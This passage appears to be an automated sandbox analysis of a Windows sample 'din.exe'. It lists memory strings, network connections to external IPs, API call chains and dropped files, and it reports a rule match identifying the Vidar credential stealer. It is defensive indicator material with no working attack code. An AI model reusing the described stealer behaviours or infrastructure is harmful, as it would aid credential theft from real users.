                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887468190.000036EC00484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887468190.000036EC00484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1892929367.000036EC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891145184.000036EC00DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1889422702.000036EC00994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000015.00000002.1889422702.000036EC00994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabh
                Source: chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 000003.log4.28.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log4.28.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                Source: 000003.log4.28.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ai
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Di
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Fj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ki
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ni
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Pj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Sj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ui
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Zj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/_i
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/bi
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/dj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj8Y
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ii
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/jg
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/li
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/nj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qg
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/si
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/tg
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/vi
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/xj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~g
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/Y8i
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                Source: chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 0000001A.00000002.2013976546.000033FC00324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000015.00000002.1888137937.000036EC00650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000015.00000003.1845800410.000036EC0199C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000015.00000002.1896643585.0000593800238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844836944.000036EC01994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1845800410.000036EC0199C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889700888.000036EC00A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Centered.com, 00000010.00000002.2512611297.0000000006F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49760 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.7:49766 version: TLS 1.2
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00F7F7C7
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,16_2_00F7F55C
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F99FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00F99FD2

                System Summary

                Source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F74763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,16_2_00F74763
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00F61B4D
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00F6F20D
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\CoursesNutritional
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\PleaseResearch
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\AfricaDts
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\CloseVanilla
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\PositionDisclaimers
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\RequirementsProgram
                Source: C:\Users\user\Desktop\din.exe File created: C:\Windows\ToiletDetermines
                Source: C:\Users\user\Desktop\din.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: String function: 00F20DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: String function: 00F1FD52 appears 40 times
                Source: din.exe Static PE information: invalid certificate
                Source: din.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
